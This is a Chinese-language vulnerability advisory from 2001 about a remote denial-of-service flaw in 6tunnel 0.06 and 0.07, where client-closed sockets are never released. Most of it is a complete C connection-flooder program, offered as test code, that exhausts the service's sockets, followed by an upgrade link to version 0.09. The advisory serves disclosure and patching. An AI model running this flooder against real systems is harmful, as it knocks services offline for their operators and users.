
6tunnel 存在远程拒绝服务攻击


发布时间:2001-10-24
更新时间:2001-10-24
严重程度:
威胁程度:远程拒绝服务
错误类型:设计错误
利用方式:服务器模式

受影响系统
6tunnel 0.06
6tunnel 0.07
详细描述
6tunnel是一个简单的通道(隧道)类程序,用来做IRC代理。其中存在的漏洞可以导致程序崩溃。

当客户端连接到6tunnel时,所打开的socket没有被正确关闭。在某些情况下,当服务
程序关闭连接时,socket会在一段较短的超时后关闭;但如果是客户端先断开连接然后
关闭,socket会一直保留在CLOSE状态,直到6tunnel被停止。因此,通过反复连接/断开,
可以使大量socket无法关闭,最终导致6tunnel崩溃。

测试代码
/*
* ipv4/ipv6 tcp connection flooder.
* Originally used as a DoS for 6tunnel (versions < 0.08).
* Version 0.08 is a broken version. Please update to 0.09.
*
* Description of options:
* -6    :    flood an ipv6 address.
* port :    tcp port to flood (default: 667)
* delay:    delay between connections (labelled ms, but the value is passed
*           unscaled to usleep(), i.e. it is interpreted as microseconds).
* times:    max number of connections (default: 2500).
*
* awayzzz <awayzzz@digibel.org>
* You can even find me @IRCnet if you need.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

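#define DEFP    667        // default port.
#define DEFT    2500        // default number of connections.
#define TIME    100000    // default delay between connections; main() hands
                            // it to usleep(), so the unit is microseconds.
                            // tune it for best performances!

#define HAVE_IPV6           // compile in the AF_INET6 code path.

// Non-zero when i is a usable TCP port number (1..65535). The argument is
// parenthesized so that an expression can be passed; note that it is still
// evaluated twice, so do not pass something with side effects.
#define VALID_PORT(i)   ((i) > 0 && (i) <= 65535)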

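/* Print the command-line synopsis, using the basename of argv0 if present. */
static void print_usage(const char *argv0)
{
   const char *pname = "prog";

   if(argv0)
   {
      const char *slash = strrchr(argv0, '/');
      pname = slash ? slash + 1 : argv0;
   }

   /* The delay is handed to usleep() unscaled, hence microseconds. */
   printf("Usage: %s [-6] ip4/6 [port] [delay (us)] [times]\n", pname);
}

/*
 * Test program from the advisory: connects to one address/port over TCP and
 * closes the connection again, at most `times` times, sleeping `delay`
 * microseconds between attempts. The advisory states that 6tunnel 0.06/0.07
 * keeps the server-side socket of such a connection until the process is
 * stopped, and that 6tunnel 0.09 is the fixed release; the program can be
 * used to check that an upgraded instance no longer accumulates sockets.
 *
 * Command line: [-6] address [port] [delay] [times]
 *
 * Returns 0 after the loop ends (also when a connect fails, as before) and
 * after printing the usage for an empty command line; returns EXIT_FAILURE
 * when the address is missing or cannot be parsed.
 */
int main(int argc,char *argv[])
{
   int ret, fd, i, ip6 = 0;
   int times = DEFT, port = DEFP, delay = TIME;
   int family = AF_INET;
   const char *prog = (argc > 0) ? argv[0] : NULL;
   struct sockaddr *addr;
   socklen_t addrlen;
   struct sockaddr_in sin;

#ifdef HAVE_IPV6
   struct sockaddr_in6 sin6;
#endif

   if( argc < 2 )
   {
      print_usage(prog);
      exit (0);
   }

   if(!strcmp(argv[1],"-6"))
   {
#ifdef HAVE_IPV6
      ip6 = 1;
#endif
      argv++;
      argc--;
   }

   /* "-6" alone used to leave argv[1] == NULL and crash further down. */
   if(argc < 2)
   {
      print_usage(prog);
      return EXIT_FAILURE;
   }

   if(argc > 2)
   {
      long val = strtol(argv[2], NULL, 10);

      /* Range-check before narrowing so huge values cannot wrap into range. */
      if(!VALID_PORT(val))
      {
         fprintf(stderr,"Invalid port number. Using default\n");
         port = DEFP;
      }
      else
         port = (int)val;
   }

   if(argc > 3)
   {
      delay = strtol(argv[3], NULL, 10);
      /* A negative value would turn into a huge unsigned usleep() argument. */
      if(delay < 0)
      {
         fprintf(stderr,"Invalid delay. Using default\n");
         delay = TIME;
      }
   }

   if(argc > 4)
      times = strtol(argv[4], NULL, 10);

   /*
    * Build the destination once, and refuse to start when the address does
    * not parse. Previously a failed inet_pton() left the all-zero address in
    * place and a failed inet_addr() yielded INADDR_NONE, so a typo sent the
    * connections somewhere other than the intended host.
    */
#ifdef HAVE_IPV6
   if(ip6)
   {
      memset(&sin6, 0, sizeof(sin6));
      sin6.sin6_family = AF_INET6;
      sin6.sin6_port = htons((unsigned short)port);
      if(inet_pton(AF_INET6, argv[1], &sin6.sin6_addr) != 1)
      {
         fprintf(stderr,"Invalid ipv6 address: %s\n", argv[1]);
         return EXIT_FAILURE;
      }
      family = AF_INET6;
      addr = (struct sockaddr *)&sin6;
      addrlen = sizeof(sin6);
   }
   else
#endif /* HAVE_IPV6 */
   {
      memset(&sin, 0, sizeof(sin));
      sin.sin_family = AF_INET;
      sin.sin_port = htons((unsigned short)port);
      sin.sin_addr.s_addr = inet_addr(argv[1]);
      if(sin.sin_addr.s_addr == INADDR_NONE)
      {
         fprintf(stderr,"Invalid ipv4 address: %s\n", argv[1]);
         return EXIT_FAILURE;
      }
      addr = (struct sockaddr *)&sin;
      addrlen = sizeof(sin);
   }

   printf("Started with %s flood to %s on %d for %d times!\n",
         (ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);

   for (i = 0; i < times; i++)
   {
      fd = socket(family, SOCK_STREAM, 0);
      if(fd < 0)
      {
         /* Local descriptor/resource problem; nothing was sent. */
         perror("socket");
         break;
      }

      ret = connect(fd, addr, addrlen);
      if(ret < 0)
      {
         printf("connect %d failed.\n",i);
         perror("connect");
         close(fd);   /* after perror() so errno is still the connect error */
         break;
      }

      printf("Connection no. %d\n",i);
      close(fd);
      usleep(delay);
   }

   return 0;
}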
/* :wq */

解决方案
升级程序:

ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz

相关信息
awayzzz (awayzzz@digibel.org)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0200.html